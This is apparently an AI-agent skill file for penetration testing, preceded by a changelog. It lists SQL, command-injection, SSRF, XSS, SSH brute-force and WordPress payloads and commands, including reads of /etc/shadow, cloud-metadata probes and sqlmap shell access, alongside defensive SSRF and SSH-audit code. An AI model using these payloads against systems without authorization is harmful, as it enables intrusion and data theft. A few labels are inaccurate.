Major updates:
- Added 35+ new skills from awesome-opencode-skills and antigravity repos
- Merged SEO skills into seo-master
- Merged architecture skills into architecture
- Merged security skills into security-auditor and security-coder
- Merged testing skills into testing-master and testing-patterns
- Merged pentesting skills into pentesting
- Renamed website-creator to thai-frontend-dev
- Replaced skill-creator with github version
- Removed Chutes references (use MiniMax API instead)
- Added install-openclaw-skills.sh for cross-platform installation
- Updated .env.example with MiniMax API credentials
| name | description |
|---|---|
| pentesting | Penetration testing skill combining SQL injection, command injection, SSRF, HTML injection, SSH, and WordPress penetration testing. Use when performing security assessments. |
# Penetration Testing

Comprehensive pentesting skill combining SQL injection, command injection, SSRF, HTML injection, SSH, and specialized platform testing.

## Quick Reference
| Vulnerability | Use Section |
|---|---|
| SQL Injection | SQL Injection |
| Database enumeration | SQLMap |
| Command injection | Command Injection |
| SSRF | SSRF Testing |
| HTML injection | HTML Injection |
| SSH testing | SSH Pentesting |
| WordPress | WordPress Testing |
| Web3 | Web3 Testing |
## SQL Injection

### Types

- **In-Band** - Data returned via the same channel
- **Blind** - No data returned; infer from behavior
- **Time-Based** - Use delays to infer data
- **Out-of-Band** - Data returned via an alternative channel
### Testing Checklist

```sql
-- Basic tests
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1'/*
admin' --
admin' #
admin'/*
' OR 1=1--
' OR 1=1#
' OR 1=1/*
```
### NoSQL Injection

```javascript
// MongoDB operator injection
{"$ne": null}
{"$gt": ""}
{"$regex": ".*"}
{"$where": "function() { return true; }"}
```
### SQLMap

```bash
# Basic scan
sqlmap -u "http://target.com/?id=1"
# POST request
sqlmap -u "http://target.com/login" --data="username=admin&password=test"
# Cookie injection
sqlmap -u "http://target.com/" --cookie="PHPSESSID=abc123"
# Enumerate databases
sqlmap -u "http://target.com/?id=1" --dbs
# Enumerate tables
sqlmap -u "http://target.com/?id=1" -D database_name --tables
# Dump data
sqlmap -u "http://target.com/?id=1" -D database_name -T users --dump
# Shell access
sqlmap -u "http://target.com/?id=1" --os-shell
```
### SQLMap Options

| Option | Description |
|---|---|
| `--dbs` | List databases |
| `-D` | Specify database |
| `--tables` | List tables |
| `-T` | Specify table |
| `--dump` | Extract data |
| `--os-shell` | OS shell access |
| `--batch` | Non-interactive |
| `--risk=3` | High risk tests |
## Command Injection

### Testing Checklist

```bash
# Common payloads
; ls
| ls
& ls
&& ls
|| ls
`ls`
$(ls)
| cat /etc/passwd
; cat /etc/passwd
`cat /etc/passwd`
$(cat /etc/passwd)
# Blind command injection (observe the delay)
& sleep 5 &
| sleep 5 &
; sleep 5 &
```
### Filter Bypass

```bash
# Space bypass
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}
# No quotes
cat /etc/passwd
cat /etc/shadow
# Encoding
echo "Y2F0ICAvZXRjL3Bhc3N3ZA==" | base64 -d
```
## SSRF (Server-Side Request Forgery)

### Testing Checklist

```text
# Localhost
http://127.0.0.1
http://localhost
http://[::1]
# Cloud metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/
# Internal services
http://192.168.1.1
http://10.0.0.1
http://internal/
# File access
file:///etc/passwd
dict://localhost:11211/stats
sftp://localhost/
```
### SSRF Bypasses

```text
# DNS rebinding
http://127.1.1.1
http://0x7f000001
# URL encoding
http://%31%32%37%2e%30%2e%30%2e%31
# IP shortening
http://2130706433
http://017700000001
# IPv6
http://[0:0:0:0:0:ffff:127.0.0.1]
```
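Every bypass above is the same loopback address written in a form a string-matching blocklist misses. As an added defensive example (not part of the original skill), the Python check below normalizes each literal form listed here before deciding, and hands DNS names back as `resolve` so the caller resolves them and re-checks the answer. The function names `parse_host_ip` and `ssrf_verdict` are mine; it assumes a libc whose `inet_aton` accepts the decimal, octal and hex shorthand, which glibc and the BSD libcs do.

```python
import ipaddress
import socket
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def parse_host_ip(host):
    """Return an IPv4Address/IPv6Address for any literal form of the host,
    or None when it is a DNS name that still has to be resolved.
    Percent-encoding is undone first; single-number forms (decimal
    2130706433, octal 017700000001, hex 0x7f000001) go through
    socket.inet_aton, which accepts the same shorthand the C library,
    and therefore most HTTP clients, accept."""
    host = unquote(host)
    try:
        addr = ipaddress.ip_address(host)        # dotted quad or IPv6 literal
    except ValueError:
        try:
            addr = ipaddress.IPv4Address(socket.inet_aton(host))
        except OSError:
            return None                          # not an IP literal at all
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped                  # [::ffff:127.0.0.1] -> 127.0.0.1
    return addr


def ssrf_verdict(url):
    """'block': non-http(s) scheme (file://, dict://, sftp://) or a literal
    in loopback, private, link-local (169.254.169.254), reserved, multicast
    or unspecified (0.0.0.0) space.
    'resolve': a DNS name; resolve it, run this same check on every returned
    address, and connect to that pinned address so a rebinding answer between
    check and use cannot swap in an internal IP.
    'allow': a public IP literal."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return "block"
    addr = parse_host_ip(parts.hostname)
    if addr is None:
        return "resolve"
    if (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified):
        return "block"
    return "allow"
```

The check is deliberately an allow-list on scheme plus a deny on every non-public range, rather than a list of bad strings; `http://0/` (0.0.0.0) is caught by `is_unspecified` even though it appears nowhere in the payload list.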
## HTML Injection

### Testing Checklist

```html
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
<a href="javascript:alert(1)">click</a>
<div style="background:url(javascript:alert(1))">
<marquee onstart=alert(1)>
```
### XSS Contexts

| Context | Payload |
|---|---|
| HTML body | `<script>alert(1)</script>` |
| Attribute | `" onmouseover=alert(1) x="` |
| URL | `javascript:alert(1)` |
| CSS | `style="x:expression(alert(1))"` |
| JavaScript | `';alert(1);//` |
## SSH Penetration Testing

### Testing Checklist

```bash
# SSH version detection (the remote version string is printed in the verbose output)
ssh -v -o BatchMode=yes target.com 2>&1 | grep "remote software version"
# Banner grabbing
nc target.com 22
# Authentication testing
hydra -l root -p password ssh://target.com
medusa -h target.com -u root -P passwords.txt -M ssh
# Key authentication
ssh -i key.pem root@target.com
# Weak keys check
./ssh-audit.py target.com
```
### SSH Audit

```bash
# Check the effective SSH config
sshd -T
# Common issues
# - Weak ciphers
# - Old protocol
# - Root login allowed
# - Empty passwords
# - Default keys
```
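As an added example that is not part of the original skill, a Python checker that takes captured `sshd -T` output and reports the issues listed above: root login, empty passwords, password authentication, protocol 1, and weak ciphers, MACs and key exchanges. The weak-algorithm sets are my own selection of legacy algorithms (tools such as ssh-audit keep a fuller list) and the sample output is constructed.

```python
# Legacy algorithms to flag; this selection is the example author's, not
# an exhaustive list.
WEAK_CIPHERS = {"3des-cbc", "aes128-cbc", "aes192-cbc", "aes256-cbc",
                "arcfour", "arcfour128", "arcfour256", "blowfish-cbc"}
WEAK_MACS = {"hmac-md5", "hmac-md5-96", "hmac-sha1-96", "hmac-md5-etm@openssh.com"}
WEAK_KEX = {"diffie-hellman-group1-sha1", "diffie-hellman-group14-sha1",
            "diffie-hellman-group-exchange-sha1"}

# Constructed sample of `sshd -T` output (sshd prints keywords lowercased).
SAMPLE_SSHD_T = """\
port 22
permitrootlogin yes
permitemptypasswords no
passwordauthentication yes
ciphers aes128-ctr,aes256-gcm@openssh.com,3des-cbc
macs hmac-sha2-256,hmac-md5
kexalgorithms curve25519-sha256,diffie-hellman-group1-sha1
"""


def parse_sshd_t(text):
    """Map each effective keyword to its value string."""
    cfg = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            cfg[key.lower()] = value.strip()
    return cfg


def audit_sshd(text):
    """Return the findings for one sshd -T dump, in a stable order."""
    cfg = parse_sshd_t(text)
    findings = []
    if "1" in cfg.get("protocol", "2").split(","):   # only old OpenSSH prints this
        findings.append("SSH protocol 1 enabled")
    if cfg.get("permitrootlogin", "prohibit-password") == "yes":
        findings.append("Root login with password allowed (permitrootlogin yes)")
    if cfg.get("permitemptypasswords", "no") == "yes":
        findings.append("Empty passwords accepted (permitemptypasswords yes)")
    if cfg.get("passwordauthentication", "yes") == "yes":
        findings.append("Password authentication enabled; prefer keys only")
    for keyword, weak, label in (("ciphers", WEAK_CIPHERS, "cipher"),
                                 ("macs", WEAK_MACS, "MAC"),
                                 ("kexalgorithms", WEAK_KEX, "key exchange")):
        offered = set(cfg.get(keyword, "").split(","))
        for alg in sorted(offered & weak):
            findings.append(f"Weak {label} offered: {alg}")
    return findings
```

Run it against the real dump with `sshd -T > sshd.txt` and `audit_sshd(open("sshd.txt").read())`; because `sshd -T` prints the effective configuration after all `Match` blocks and defaults are applied, it catches settings that a grep of `sshd_config` would miss.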
## WordPress Penetration Testing

### Enumeration

```bash
# Version detection
curl -s target.com/ | grep generator
# User enumeration
curl -s "target.com/wp-json/wp/v2/users/"
# Plugins
curl -s "target.com/wp-content/plugins/"
wpscan --url target.com --enumerate p
# Themes
wpscan --url target.com --enumerate t
# Users
wpscan --url target.com --enumerate u
```
### Common Vulnerabilities

```bash
# Plugin vulnerabilities
wpscan --url target.com --enumerate vp
# Password attacks
wpscan --url target.com --passwords wordlist.txt
# XMLRPC
curl -X POST "http://target.com/xmlrpc.php" -d "<?xml version='1.0'?><methodCall><methodName>wp.getUsers</methodName></methodCall>"
# Debug mode
curl -s "target.com/wp-config.php" | grep WP_DEBUG
```
### WPScan

```bash
# Full scan
wpscan --url target.com --enumerate all --api-token YOUR_TOKEN
# Vulnerability scan
wpscan --url target.com --enumerate vpt
# Password attack
wpscan --url target.com -P passwords.txt -U admin
```
## Web3 Testing

### Smart Contract Testing

```bash
# Slither - static analysis
slither contract.sol
# Mythril - security analysis
myth analyze contract.sol
# Echidna - fuzzing
echidna contract.sol
# Foundry - testing framework
forge test
```

### Common Vulnerabilities
| Vulnerability | Description |
|---|---|
| Reentrancy | Withdraw before state update |
| Integer overflow | Math errors in calculations |
| Access control | Missing modifiers |
| Front-running | Transaction ordering |
| Timestamp dependence | Block timestamp manipulation |
## OWASP Top 10 (2023)

| ID | Category |
|---|---|
| A01 | Broken Access Control |
| A02 | Cryptographic Failures |
| A03 | Injection |
| A04 | Insecure Design |
| A05 | Security Misconfiguration |
| A06 | Vulnerable Components |
| A07 | Auth Failures |
| A08 | Data Integrity Failures |
| A09 | Logging Failures |
| A10 | SSRF |
## Report Template

### Finding Details

```markdown
## [Finding Title]

**Severity:** Critical / High / Medium / Low / Informational

**CVSS Score:** [0.0-10.0]

**Description:**
[Detailed description of the vulnerability]

**Impact:**
[How this could be exploited and its business impact]

**Steps to Reproduce:**
1. [Step 1]
2. [Step 2]
3. [Step 3]

**Proof of Concept:**
[Code snippets, screenshots, etc.]

**Remediation:**
[How to fix the vulnerability]

**References:**
- [Link 1]
- [Link 2]
```
## Legal Disclaimer

WARNING: Only test systems you have explicit written permission to test. Unauthorized penetration testing is illegal.

## Best Practices

- **Get Written Permission** - Before any testing
- **Define Scope** - Clear boundaries
- **Document Everything** - Keep detailed notes
- **Don't Exploit** - Demonstrate impact, don't destroy
- **Report Responsibly** - Follow responsible disclosure
- **Prioritize** - Focus on high-impact findings